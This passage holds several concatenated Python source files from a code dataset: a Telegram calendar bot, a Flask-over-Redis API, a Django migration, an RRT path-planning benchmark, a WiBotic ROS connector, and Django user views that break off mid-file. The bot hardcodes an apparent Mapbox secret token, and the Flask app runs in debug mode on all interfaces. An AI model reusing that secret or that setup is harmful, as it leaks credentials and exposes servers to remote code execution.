I am an event manager bot.To use me you have authorise\")\r\n creds = None\r\n # The file token.pickle stores the user's access and refresh tokens, and is\r\n # created automatically when the authorization flow completes for the first\r\n # time.\r\n bot.send_message(chat_id=update.message.chat_id,\r\n text=\"https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=558268665760-efbmhgve4ovnendbv5um6sr5o1shqd4a.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A62799%2F&scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcalendar.readonly&state=wLSAOuK4H1CvlrgIifQgH9zte1nvcF&access_type=offline\")\r\n if os.path.exists('token.pickle'):\r\n with open('token.pickle', 'rb') as token:\r\n creds = pickle.load(token)\r\n # If there are no (valid) credentials available, let the user log in.\r\n if not creds or not creds.valid:\r\n if creds and creds.expired and creds.refresh_token:\r\n creds.refresh(Request())\r\n else:\r\n flow = InstalledAppFlow.from_client_secrets_file(\r\n 'credentials.json', SCOPES)\r\n creds = flow.run_local_server(port=0)\r\n # Save the credentials for the next run\r\n with open('token.pickle', 'wb') as token:\r\n pickle.dump(creds, token)\r\n\r\n self.service = build('calendar', 'v3', credentials=creds)\r\n\r\n # def textMessage(bot, update):\r\n # response = 'Получил Ваше сообщение: ' + update.message.text\r\n # bot.send_message(chat_id=update.message.chat_id, text=response)\r\n\r\n def AddMessage(self, bot, update):\r\n bot.send_message(chat_id=update.message.chat_id, text=\"What is the name of event\")\r\n x = update.message.text\r\n GMT_OFF = '+03:00'\r\n event = {\r\n 'summary': 'Dinner with friends',\r\n 'start': {'dateTime': '2015-09-18T19:00:00%s' % GMT_OFF},\r\n 'end': {'dateTime': '2015-09-18T22:00:00%s' % GMT_OFF},\r\n 'attendees': [\r\n {'email': 'friend1@example.com'},\r\n ],\r\n }\r\n self.service.events().insert(calendarId='primary', sendnotification=True, body=event).execute()\r\n\r\n def DeleteMessage(self, bot, update):\r\n bot.send_message(chat_id=update.message.chat_id, text=\"What is the name of event\")\r\n\r\n def ChangeMessage(self, bot, update):\r\n bot.send_message(chat_id=update.message.chat_id, text=\"What is the name of event\")\r\n\r\n def CheckDailyMessage(self, bot, update):\r\n pass\r\n\r\n def CheckNextEventsMessage(self, bot, update):\r\n # Call the Calendar API\r\n now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC time\r\n bot.send_message(chat_id=update.message.chat_id, text='Getting the upcoming 10 events')\r\n events_result = self.service.events().list(calendarId='primary', timeMin=now,\r\n maxResults=10, singleEvents=True,\r\n orderBy='startTime').execute()\r\n events = events_result.get('items', [])\r\n\r\n if not events:\r\n bot.send_message(chat_id=update.message.chat_id, text='No upcoming events found.')\r\n for event in events:\r\n start = event['start'].get('dateTime', event['start'].get('date'))\r\n bot.send_message(chat_id=update.message.chat_id, text=(start, event['summary']))\r\n\r\n\r\n def geoMessage(self, bot, update):\r\n bot.send_message(chat_id=update.message.chat_id,\r\n text=\"What is your origin?\")\r\n origin = update.message.text\r\n # time = time.time(20)\r\n bot.send_message(chat_id=update.message.chat_id,\r\n text=\"What is your destination?\")\r\n destination = update.message.text\r\n geocoder = mapbox.Geocoder(access_token='sk.eyJ1IjoiZGlhbmthbG9sNCIsImEiOiJjazhzdjE4c3QwMnlwM2Rud2EwZzg1b29iIn0.OqtyNqmiJI5q6UbWQC6oCQ')\r\n response = geocoder.forward('Paris, 
France')\r\n with open('text.json', 'w', encoding='UTF-8') as f:\r\n json.dump(response.json(), f)\r\n\r\n from mapbox import Directions\r\n resp = Directions('mapbox.driving').directions([origin, destination])\r\n driving_routes = resp.geojson()\r\n first_route = driving_routes['features'][0]\r\n bot.send_message(chat_id=update.message.chat_id,\r\n pic=resp)\r\n\r\nif __name__ == \"__main__\":\r\n # Хендлеры\r\n c = Calendar()\r\n start_command_handler = CommandHandler('start', c.startCommand)\r\n # text_message_handler = MessageHandler(Filters.text, textMessage)\r\n geo_message_handler = CommandHandler('root', c.geoMessage)\r\n add_message_handler = CommandHandler('add', c.AddMessage)\r\n delete_message_handler = CommandHandler('delete', c.DeleteMessage)\r\n change_message_handler = CommandHandler('change', c.ChangeMessage)\r\n check_daily_message_handler = CommandHandler('check_daily', c.CheckDailyMessage)\r\n check_weekly_message_handler = CommandHandler('check_next_events', c.CheckNextEventsMessage)\r\n # Добавляем хендлеры в диспетчер\r\n dispatcher.add_handler(start_command_handler)\r\n # dispatcher.add_handler(text_message_handler)\r\n dispatcher.add_handler(geo_message_handler)\r\n dispatcher.add_handler(add_message_handler)\r\n dispatcher.add_handler(delete_message_handler)\r\n dispatcher.add_handler(change_message_handler)\r\n dispatcher.add_handler(check_daily_message_handler)\r\n dispatcher.add_handler(check_weekly_message_handler)\r\n # Начинаем поиск обновлений\r\n updater.start_polling(clean=True)\r\n # Останавливаем бота, если были нажаты Ctrl + C\r\n updater.idle()","sub_path":"Hw3.py","file_name":"Hw3.py","file_ext":"py","file_size_in_byte":6658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"57322237","text":"import redis\nfrom flask import Flask\n\nconn = redis.Redis('localhost')\n\napplication = Flask(__name__)\n\n\n@application.route(\"/health\")\ndef health():\n return \"Hello from CloudEnsure Internal API!\"\n\n\n@application.route(\"/\", methods=['GET'])\ndef find_key(key):\n try:\n print(key, type(key))\n values = conn.hgetall(key)\n x = {y.decode('ascii'): values.get(y).decode(\n 'ascii') for y in values.keys()}\n\n return x\n except Exception as e:\n print(e)\n message = \"No result Found\"\n return message\n\n\nif __name__ == \"__main__\":\n application.run(debug=True, host='0.0.0.0')\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"88714226","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Poll',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=255)),\n ('stub', models.CharField(max_length=32)),\n ('bot_name', models.CharField(max_length=32)),\n ('frequency', models.IntegerField(default=24)),\n ('submission_removal', models.IntegerField(default=168)),\n ('winning_text', models.CharField(max_length=255, null=True, blank=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Submission',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', 
models.CharField(max_length=255)),\n ('url', models.URLField()),\n ('submitted', models.DateTimeField(auto_now_add=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Vote',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('day', models.DateField(auto_now_add=True)),\n ('submission', models.ForeignKey(related_name='submission_votes', to='poll.Submission')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"incrowd/poll/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"483626062","text":"import math\nimport time\nimport statistics\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom shapely.geometry import Polygon, Point\nimport random\n\nfrom rrt_dubins import RRT, createSharkGrid\nfrom motion_plan_state import Motion_plan_state\nimport catalina\nfrom sharkOccupancyGrid import SharkOccupancyGrid, splitCell\n\ndef summary_1(weight, obstacles, boundary, habitats, shark_dict, sharkGrid, test_num=100):\n '''\n generate a summary about each term of one specific cost function, given randomly chosen environment\n \n cost_func: a list of lists of weights assigned to each term in the cost function\n test_num: the number of tests to run under a specific cost function\n\n output:\n cost_avr: a dictionary summarizing the result of each term of the cost function, \n key will be weight i.e. w1, w2, ...\n value will be the average cost of each term\n '''\n testing = RRT(boundary, obstacles, shark_dict, sharkGrid)\n\n cost_summary_ex = [[] for _ in range(len(weight))]\n cost_summary_rp = [[] for _ in range(len(weight))]\n\n for _ in range(test_num):\n initial_x = random.uniform(-300, -100)\n initial_y = random.uniform(-100, 100)\n initial = Point(initial_x, initial_y)\n while not initial.within(boundary_poly):\n initial_x = random.uniform(-300, -100)\n initial_y = random.uniform(-100, 100)\n initial = Point(initial_x, initial_y)\n initial = Motion_plan_state(initial_x, initial_y)\n\n res1 = testing.exploring(initial, habitats, 0.5, 5, 1, 50, True, 20.0, 500.0, weights=weight)\n print(res1[\"cost\"])\n for i in range(len(res1[\"cost\"][1])):\n cost_summary_ex[i].append(res1[\"cost\"][1][i])\n\n res2 = testing.replanning(initial, habitats, 10.0, 100.0, 0.1)\n print(res2[2])\n for i in range(len(res2[2][1])):\n cost_summary_rp[i].append(res2[2][1][i])\n\n #calculate average cost for each term\n result1 = []\n for cost in cost_summary_ex:\n result1.append(statistics.mean(cost))\n result2 = []\n for cost in cost_summary_rp:\n result2.append(statistics.mean(cost))\n \n return [result2, result1]\n\ndef plot_summary_1(labels, summarys):\n x = np.arange(len(labels)) # the label locations\n width = 0.2 # the width of the bars\n weight1 = summarys[0]\n weight2 = summarys[1]\n weight3 = summarys[2]\n weight4 = summarys[3]\n\n fig, ax = plt.subplots()\n rects1 = ax.bar(x - 1.5 * width, weight1, width, label='weight1')\n rects2 = ax.bar(x - 0.5 * width, weight2, width, label=\"weight2\")\n rects3 = ax.bar(x + 0.5 * width, weight3, width, label='weight3')\n rects4 = ax.bar(x + 1.5 * width, weight4, width, label='weight4')\n\n # Add some text for labels, title and custom x-axis tick labels, etc.\n ax.set_ylabel('average cost')\n ax.set_xticks(x)\n ax.set_xticklabels(labels)\n ax.legend()\n\n\n def autolabel(rects):\n \"\"\"Attach a text 
label above each bar in *rects*, displaying its height.\"\"\"\n for rect in rects:\n height = rect.get_height()\n ax.annotate('{}'.format(height),\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(0, 3), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom')\n\n autolabel(rects1)\n autolabel(rects2)\n autolabel(rects3)\n autolabel(rects4)\n\n fig.tight_layout()\n\n plt.show()\n\ndef summary_2(start, goal, obstacle_array, boundary, habitats, shark_dict, sharkGrid, test_num, test_time, plot_interval, weights):\n '''generate the average cost of optimal paths of one weight scheme'''\n cost_list = [[]for _ in range(math.ceil(test_time//plot_interval))]\n improvement = []\n\n for _ in range(test_num):\n rrt = RRT(start, goal, boundary, obstacle_array, habitats)\n if weights[1] == \"random time\":\n plan_time = True\n if weights[2] == \"trajectory time stamp\":\n traj_time_stamp = True\n else:\n traj_time_stamp = False\n elif weights[1] == \"random (x,y)\":\n plan_time = False\n traj_time_stamp = False\n result = rrt.exploring(shark_dict, sharkGrid, plot_interval, 5, 1, 50,traj_time_stamp=traj_time_stamp, max_plan_time=test_time, plan_time=plan_time, weights=weights[0])\n if result:\n cost = result[\"cost list\"]\n for i in range(len(cost)):\n cost_list[i].append(cost[i])\n \n cost_mean = []\n for i in range(len(cost_list)):\n temp_mean = statistics.mean(cost_list[i])\n if i >= 1:\n improvement.append(\"{:.0%}\".format(temp_mean / cost_mean[-1]))\n cost_mean.append(temp_mean)\n \n #plot_summary_2(time_list, cost_list)\n #print(cost_mean, improvement)\n return cost_mean, improvement\n\ndef plot_summary_2(x_list, y_list):\n\n for i in range(len(x_list)):\n plt.plot(x_list[i], y_list[i])\n\n # Add some text for labels, title and custom x-axis tick labels, etc.\n plt.ylabel('optimal sum cost')\n plt.title('RRT performance')\n\n plt.show()\n\ndef summary_3(start, goal, boundary, boundary_poly, obstacle_array, habitats, shark_dict, test_num, plan_time, plot_interval):\n '''draw average cost of optimal path from different weight schemes as a function of time'''\n results = []\n improvements = []\n time_list = [plot_interval + i * plot_interval for i in range(math.ceil(plan_time//plot_interval))]\n\n weight1 = [[1, -3, -1, -5], \"random time\", \"trajectory time stamp\"]\n weight2 = [[1, -3, -1, -5], \"random time\", \"planning time stamp\"]\n weight3 = [[1, -3, -1, -5], \"random (x,y)\"]\n weights = [weight1, weight2, weight3]\n\n cell_list = splitCell(boundary_poly, 10)\n sharkGrid = createSharkGrid('path_planning/AUVGrid_prob.csv', cell_list)\n \n for weight in weights:\n result, improvement = summary_2(start, goal, obstacle_array, boundary, habitats, shark_dict, sharkGrid, test_num, plan_time, plot_interval, weight)\n results.append(result)\n improvements.append(improvement)\n\n plt.figure(1)\n for i in range(len(results)):\n plt.plot(time_list, results[i], label=str(weights[i]))\n plt.ylabel('Optimal Path Cost')\n plt.xlabel('Planning Time')\n plt.title('Optimal Path Cost VS Planning Time')\n plt.legend()\n plt.show()\n plt.close()\n\n # plt.figure(2)\n # for i in range(len(improvements)):\n # print(time_list[1:], improvements[i])\n # plt.plot(time_list[1:], improvements[i], label=str(weights[i]))\n # plt.ylabel('Proportion Cost Optimization')\n # plt.xlabel('Planning Time')\n # plt.title('Percent Optimization over Planning Time')\n # plt.legend()\n # plt.show()\n # plt.close()\n\ndef plot_time_stamp(start, goal, boundary, obstacle_array, habitats):\n 
'''draw time stamp distribution of one rrt_rubins path planning algorithm'''\n rrt = RRT(start, goal, boundary, obstacle_array, habitats)\n result = rrt.exploring(habitats, 0.5, 5, 1, max_plan_time=10.0, weights=[1,-4.5,-4.5])\n time_stamp_list = result[\"time stamp\"]\n bin_list = time_stamp_list.keys()\n num_time_list = []\n for time_bin in bin_list:\n num_time_list.append(len(time_stamp_list[time_bin]))\n \n plt.title(\"time stamp distribution\")\n plt.xlabel(\"time stamp bin\")\n plt.ylabel(\"number of motion_plan_states\")\n #plt.xticks(self.bin_list)\n plt.bar(bin_list, num_time_list, color=\"g\")\n \n plt.show()\n\n#initialize start, goal, obstacle, boundary, habitats for path planning\nstart = catalina.create_cartesian(catalina.START, catalina.ORIGIN_BOUND)\nstart = Motion_plan_state(start[0], start[1])\n\ngoal = catalina.create_cartesian(catalina.GOAL, catalina.ORIGIN_BOUND)\ngoal = Motion_plan_state(goal[0], goal[1])\n\nobstacles = []\nfor ob in catalina.OBSTACLES:\n pos = catalina.create_cartesian((ob.x, ob.y), catalina.ORIGIN_BOUND)\n obstacles.append(Motion_plan_state(pos[0], pos[1], size=ob.size))\nfor boat in catalina.BOATS:\n pos = catalina.create_cartesian((boat.x, boat.y), catalina.ORIGIN_BOUND)\n obstacles.append(Motion_plan_state(pos[0], pos[1], size=boat.size))\n \nboundary = []\nboundary_poly = []\nfor b in catalina.BOUNDARIES:\n pos = catalina.create_cartesian((b.x, b.y), catalina.ORIGIN_BOUND)\n boundary.append(Motion_plan_state(pos[0], pos[1]))\n boundary_poly.append((pos[0],pos[1]))\nboundary_poly = Polygon(boundary_poly)\n \n#testing data for habitats\nhabitats = []\nfor habitat in catalina.HABITATS:\n pos = catalina.create_cartesian((habitat.x, habitat.y), catalina.ORIGIN_BOUND)\n habitats.append(Motion_plan_state(pos[0], pos[1], size=habitat.size))\n \n# testing data for shark trajectories\nshark_dict1 = {1: [Motion_plan_state(-120 + (0.2 * i), -60 + (0.2 * i), traj_time_stamp=i) for i in range(1,501)], \n 2: [Motion_plan_state(-65 - (0.2 * i), -50 + (0.2 * i), traj_time_stamp=i) for i in range(1,501)],\n 3: [Motion_plan_state(-110 + (0.2 * i), -40 - (0.2 * i), traj_time_stamp=i) for i in range(1,501)], \n 4: [Motion_plan_state(-105 - (0.2 * i), -55 + (0.2 * i), traj_time_stamp=i) for i in range(1,501)],\n 5: [Motion_plan_state(-120 + (0.2 * i), -50 - (0.2 * i), traj_time_stamp=i) for i in range(1,501)], \n 6: [Motion_plan_state(-85 - (0.2 * i), -55 + (0.2 * i), traj_time_stamp=i) for i in range(1,501)],\n 7: [Motion_plan_state(-270 + (0.2 * i), 50 + (0.2 * i), traj_time_stamp=i) for i in range(1,501)], \n 8: [Motion_plan_state(-250 - (0.2 * i), 75 + (0.2 * i), traj_time_stamp=i) for i in range(1,501)],\n 9: [Motion_plan_state(-260 - (0.2 * i), 75 + (0.2 * i), traj_time_stamp=i) for i in range(1,501)], \n 10: [Motion_plan_state(-275 + (0.2 * i), 80 - (0.2 * i), traj_time_stamp=i) for i in range(1,501)]}\n\nshark_dict2 = {1: [Motion_plan_state(-120 + (0.1 * i), -60 + (0.1 * i), traj_time_stamp=i) for i in range(1,301)]+ [Motion_plan_state(-90 - (0.1 * i), -30 + (0.15 * i), traj_time_stamp=i) for i in range(302,501)], \n 2: [Motion_plan_state(-65 - (0.1 * i), -50 + (0.1 * i), traj_time_stamp=i) for i in range(1,301)] + [Motion_plan_state(-95 + (0.15 * i), -20 + (0.1 * i), traj_time_stamp=i) for i in range(302,501)],\n 3: [Motion_plan_state(-110 + (0.1 * i), -40 - (0.1 * i), traj_time_stamp=i) for i in range(1,301)] + [Motion_plan_state(-80 + (0.15 * i), -70 + (0.1 * i), traj_time_stamp=i) for i in range(302,501)], \n 4: [Motion_plan_state(-105 - (0.1 * i), -55 + 
(0.1 * i), traj_time_stamp=i) for i in range(1,301)] + [Motion_plan_state(-135 + (0.12 * i), -25 + (0.07 * i), traj_time_stamp=i) for i in range(302,501)],\n 5: [Motion_plan_state(-120 + (0.1 * i), -50 - (0.1 * i), traj_time_stamp=i) for i in range(1,301)] + [Motion_plan_state(-90 + (0.11 * i), -80 + (0.1 * i), traj_time_stamp=i) for i in range(302,501)], \n 6: [Motion_plan_state(-85 - (0.1 * i), -55 + (0.1 * i), traj_time_stamp=i) for i in range(1,301)] + [Motion_plan_state(-115 - (0.09 * i), -25 - (0.1 * i), traj_time_stamp=i) for i in range(302,501)],\n 7: [Motion_plan_state(-270 + (0.1 * i), 50 + (0.1 * i), traj_time_stamp=i) for i in range(1,301)] + [Motion_plan_state(-240 - (0.08 * i), 80 + (0.1 * i), traj_time_stamp=i) for i in range(302,501)], \n 8: [Motion_plan_state(-250 - (0.1 * i), 75 + (0.1 * i), traj_time_stamp=i) for i in range(1,301)] + [Motion_plan_state(-280 - (0.1 * i), 105 - (0.1 * i), traj_time_stamp=i) for i in range(302,501)],\n 9: [Motion_plan_state(-260 - (0.1 * i), 75 + (0.1 * i), traj_time_stamp=i) for i in range(1,301)] + [Motion_plan_state(-290 + (0.08 * i), 105 + (0.07 * i), traj_time_stamp=i) for i in range(302,501)], \n 10: [Motion_plan_state(-275 + (0.1 * i), 80 - (0.1 * i), traj_time_stamp=i) for i in range(1,301)]+ [Motion_plan_state(-245 - (0.13 * i), 50 - (0.12 * i), traj_time_stamp=i) for i in range(302,501)]}\n# sharkGrid1 = createSharkGrid('path_planning/AUVGrid_prob_500_straight.csv', splitCell(boundary_poly,10))\n# sharkGrid2 = createSharkGrid('path_planning/AUVGrid_prob_500_turn.csv', splitCell(boundary_poly,10))\n\nres = summary_1([1, -3, -1, -5], obstacles, boundary, habitats, shark_dict1, sharkGrid1, test_num=10)\nplot_summary_1([\"replaning\", \"one-time planning\"], res)","sub_path":"path_planning/performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":12288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"238463074","text":"#!/usr/bin/env python\n\n# use `pip install future pyuavcan_v0` before running on python 2\n\n# ROS Imports\nimport rospy\nfrom wibotic_msg import msg, srv\n\n# Other Imports\nimport pyuavcan_v0 as uavcan\nimport threading\nimport time\nimport queue\nimport signal\nimport sys\nimport os\n\n# Global state and constants shared between threads\nDSDL_PATH = (\n os.path.dirname(__file__)\n + \"/uavcan_v0/uavcan_vendor_specific_types/wibotic\"\n)\nWIBOTIC_NODE_NAME = \"com.wibotic.charger\"\nPARAMETER_REQ_TIMEOUT = 3\nSUCCESS = 5\nFAILURE = 0\n_uav_incoming_info = queue.Queue()\n_uav_incoming_param = queue.Queue(1)\n_uav_outgoing = queue.Queue()\n_threads = []\n_shutting_down = False\n\n\ndef ClearQueue(q):\n while not q.empty():\n q.get()\n\n\ndef ascii_list_to_str(l):\n return \"\".join(chr(i) for i in l)\n\n\nclass Shutdown(Exception):\n pass\n\n\nclass ROSNodeThread(threading.Thread):\n class Node:\n def sender(self):\n pub = rospy.Publisher(\n \"~wibotic_info\",\n msg.WiBoticInfo,\n queue_size=10,\n )\n while not rospy.is_shutdown():\n incoming_data = _uav_incoming_info.get()\n uavcan_dsdl_type = uavcan.get_uavcan_data_type(\n incoming_data\n )\n unpacked_data = {}\n for field in uavcan_dsdl_type.fields:\n unpacked_data[field.name] = getattr(\n incoming_data, field.name\n )\n packaged_data = msg.WiBoticInfo(\n **unpacked_data\n )\n rospy.loginfo(packaged_data)\n pub.publish(packaged_data)\n\n def handle_param_list(self, req):\n params = []\n index = 0\n ClearQueue(_uav_incoming_param)\n while True:\n request = 
uavcan.protocol.param.GetSet.Request(\n index=index\n )\n _uav_outgoing.put(request)\n try:\n response = _uav_incoming_param.get(\n block=True,\n timeout=PARAMETER_REQ_TIMEOUT,\n )\n if (\n uavcan.get_active_union_field(\n response.value\n )\n != \"empty\"\n ):\n params.append(\n ascii_list_to_str(response.name)\n )\n index += 1\n rospy.loginfo(index)\n else:\n return [SUCCESS, params]\n except queue.Empty:\n return [FAILURE, params]\n\n def handle_param_read(self, req):\n request = uavcan.protocol.param.GetSet.Request(\n name=req.name\n )\n _uav_outgoing.put(request)\n try:\n response = _uav_incoming_param.get(\n block=True,\n timeout=PARAMETER_REQ_TIMEOUT,\n )\n if (\n uavcan.get_active_union_field(\n response.value\n )\n != \"empty\"\n ):\n status = (\n SUCCESS\n if response.name == req.name\n else FAILURE\n )\n value = response.value.integer_value\n return [status, value]\n except queue.Empty:\n pass\n\n return [FAILURE, 0]\n\n def handle_param_write(self, req):\n request = uavcan.protocol.param.GetSet.Request(\n name=req.name,\n value=uavcan.protocol.param.Value(\n integer_value=req.value\n ),\n )\n _uav_outgoing.put(request)\n try:\n response = _uav_incoming_param.get(\n block=True,\n timeout=PARAMETER_REQ_TIMEOUT,\n )\n if (\n uavcan.get_active_union_field(\n response.value\n )\n != \"empty\"\n ):\n return (\n SUCCESS\n if response.value.integer_value\n == req.value\n else FAILURE\n )\n except queue.Empty:\n pass\n\n return FAILURE\n\n def handle_param_save(self, req):\n request = uavcan.protocol.param.ExecuteOpcode.Request(\n opcode=uavcan.protocol.param.ExecuteOpcode.Request().OPCODE_SAVE\n )\n _uav_outgoing.put(request)\n try:\n response = _uav_incoming_param.get(\n block=True,\n timeout=PARAMETER_REQ_TIMEOUT,\n )\n return SUCCESS if response.ok else FAILURE\n except queue.Empty:\n return FAILURE\n\n def __init__(self):\n rospy.init_node(\"wibotic_connector_can\")\n super(ROSNodeThread, self).__init__()\n self.daemon = True\n\n def run(self):\n rospy.loginfo(\"ROS Thread Initialized\")\n node = ROSNodeThread.Node()\n try:\n rospy.Service(\n \"~read_parameter\",\n srv.ReadParameter,\n node.handle_param_read,\n )\n rospy.Service(\n \"~write_parameter\",\n srv.WriteParameter,\n node.handle_param_write,\n )\n rospy.Service(\n \"~list_parameters\",\n srv.ListParameters,\n node.handle_param_list,\n )\n rospy.Service(\n \"~save_parameters\",\n srv.SaveParameters,\n node.handle_param_save,\n )\n node.sender()\n except rospy.ROSInterruptException:\n pass\n rospy.loginfo(\"ROS Thread Finished\")\n\n\nclass UAVCanNodeThread(threading.Thread):\n class Node:\n outstanding_param_request = threading.Semaphore()\n\n def __init__(self, can_interface, node_id):\n uavcan.load_dsdl(DSDL_PATH)\n node_info = (\n uavcan.protocol.GetNodeInfo.Response()\n )\n node_info.name = \"com.wibotic.ros_connector\"\n node_info.software_version.major = 1\n try:\n self.uavcan_node = uavcan.make_node(\n can_interface,\n node_id=node_id,\n node_info=node_info,\n mode=uavcan.protocol.NodeStatus().MODE_OPERATIONAL,\n )\n except OSError:\n rospy.logerr(\n \"ERROR: Device not found. 
\"\n \"Please confirm the device name is correctly set!\"\n )\n else:\n self.monitor = uavcan.app.node_monitor.NodeMonitor(\n self.uavcan_node\n )\n self.uavcan_node.add_handler(\n uavcan.thirdparty.wibotic.WiBoticInfo,\n self.wibotic_info_callback,\n )\n\n def get_wibotic_node_id(self):\n online_nodes = self.monitor.get_all_node_id()\n for node_id in online_nodes:\n node_name = ascii_list_to_str(\n self.monitor.get(node_id).info.name\n )\n if node_name == WIBOTIC_NODE_NAME:\n return node_id\n return None\n\n def wibotic_info_callback(self, event):\n _uav_incoming_info.put(event.transfer.payload)\n\n def wibotic_param_callback(self, event):\n _uav_incoming_param.put(event.transfer.payload)\n self.outstanding_param_request.release()\n\n def send_pending(self):\n while True:\n send_item = _uav_outgoing.get()\n target_node_id = self.get_wibotic_node_id()\n if target_node_id is not None:\n self.outstanding_param_request.acquire()\n self.uavcan_node.request(\n send_item,\n target_node_id,\n self.wibotic_param_callback,\n )\n else:\n rospy.logwarn(\n \"No WiBotic device found on bus\"\n )\n\n def check_shutdown(self):\n if _shutting_down:\n self.uavcan_node.close()\n raise Shutdown(\"Node Shutdown\")\n\n def __init__(self):\n super(UAVCanNodeThread, self).__init__()\n self.daemon = True\n\n def run(self):\n rospy.loginfo(\"UAVCAN Thread Initialized\")\n\n if not rospy.has_param(\"~can_interface\"):\n rospy.set_param(\"~can_interface\", \"can0\")\n if not rospy.has_param(\"~uavcan_node_id\"):\n rospy.set_param(\"~uavcan_node_id\", 20)\n can_interface = rospy.get_param(\"~can_interface\")\n node_id = rospy.get_param(\"~uavcan_node_id\")\n node = UAVCanNodeThread.Node(can_interface, node_id)\n try:\n # Thread implicitly daemonic since parent thread is daemonic\n threading.Thread(\n target=node.send_pending\n ).start()\n node.uavcan_node.periodic(\n 1, node.check_shutdown\n )\n node.uavcan_node.spin()\n except uavcan.UAVCANException as e:\n rospy.logerr(e)\n except Shutdown as e:\n pass\n rospy.loginfo(\"UAVCAN Thread Finished\")\n\n\ndef graceful_shutdown(signal, frame):\n global _shutting_down\n if not _shutting_down:\n rospy.loginfo(\"Shutting Down\")\n\n _shutting_down = True\n rospy.signal_shutdown(\"Shutdown Requested\")\n for t in _threads:\n t.join(timeout=3)\n\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n rospy.loginfo(\"WiBotic ROS Interface\")\n\n _threads.append(UAVCanNodeThread())\n _threads.append(ROSNodeThread())\n\n for t in _threads:\n t.start()\n\n signal.signal(signal.SIGINT, graceful_shutdown)\n signal.signal(signal.SIGTERM, graceful_shutdown)\n rospy.loginfo(\"Press Ctrl+C to stop\")\n while True:\n time.sleep(1) # allow SIGINT to be handled\n","sub_path":"wibotic_connector_can/src/wibotic_connector_can/wiboticros.py","file_name":"wiboticros.py","file_ext":"py","file_size_in_byte":10463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"137604140","text":"# -*- coding:utf-8 -*-\n# Create your views here.\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.template import loader, RequestContext\nfrom forms import UserLoginForm, UserRegistrationForm, UserChangeForm, CreateOrderForm\nfrom forms import BarcodeForm\nfrom django.contrib import auth, messages\nfrom django.shortcuts import redirect\nfrom django.views.generic.simple import direct_to_template\nfrom django.contrib.auth.models import 
User\nfrom models import Facultet, Course, Program, Users, OrderReason, OrderStatus\nfrom models import Order, OrderDateInterval, OrderType, Admins\nfrom django.db import IntegrityError\nfrom django.core.exceptions import ValidationError\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom datetime import datetime\n\n\n\ndef login (request):\n form = UserLoginForm(request.POST or None)\n context = { 'form': form, }\n if request.method == 'POST' and form.is_valid():\n username = form.cleaned_data.get('email', None)\n password = form.cleaned_data.get('password', None)\n user = auth.authenticate(username=username, password=password)\n if user and user.is_active:\n auth.login(request, user)\n ## Редирект на главную\n return HttpResponseRedirect( '/mainpage/' )\n ## Редирект на логин\n return render_to_response('login.html',context_instance=RequestContext(request, context))\n\n@login_required\ndef logout (request):\n auth.logout( request )\n return HttpResponseRedirect( '/mainpage/' )\n\ndef mainpage (request):\n form = UserLoginForm(request.POST or None)\n context = { 'form': form, }\n if request.method == 'POST' and form.is_valid():\n username = form.cleaned_data.get('username', None)\n password = form.cleaned_data.get('password', None)\n user = auth.authenticate(username=username, password=password)\n if user and user.is_active:\n auth.login(request, user)\n return render_to_response('mainpage.html',context_instance=RequestContext(request, context))\n\ndef registration (request):\n error = list()\n form = UserRegistrationForm(request.POST or None)\n\n if request.method == 'POST' and form.is_valid():\n email = form.cleaned_data.get('email', None)\n password = form.cleaned_data.get('password', None)\n first_name = form.cleaned_data.get('first_name', None)\n last_name = form.cleaned_data.get('last_name', None)\n father_name = form.cleaned_data.get('father_name', None)\n facultetId = form.cleaned_data.get('facultet', None)\n programId = form.cleaned_data.get('program', None)\n birthday= form.cleaned_data.get('birthday',None)\n courseId = form.cleaned_data.get('course',None)\n phonenumber = form.cleaned_data.get('phonenumber',None)\n adress = form.cleaned_data.get('adress',None)\n #Валидация на уникальеость email\n try :\n Users.create_all(email= email,password = password,\n first_name = first_name, last_name = last_name,\n father_name =father_name,\n facultet = facultetId, program = programId,\n birthday = birthday, course = courseId,\n phonenumber = phonenumber, adress = adress)\n except ValidationError:\n error.append( u'Пользователь с таким email уже зарегистрирован')\n form._errors['email']=form.error_class([u'Пользователь с таким email уже зарегистрирован'])\n del form.cleaned_data['email']\n context = {'form': form, 'error': error }\n return render_to_response('registration.html',context_instance=RequestContext(request, context))\n\n ##TODO: отправка письма регистрации\n\n #############################\n messages.success(request,u'Поздравляем! Вы зарегистрировались. Активируйте Вашу учетную запись. 
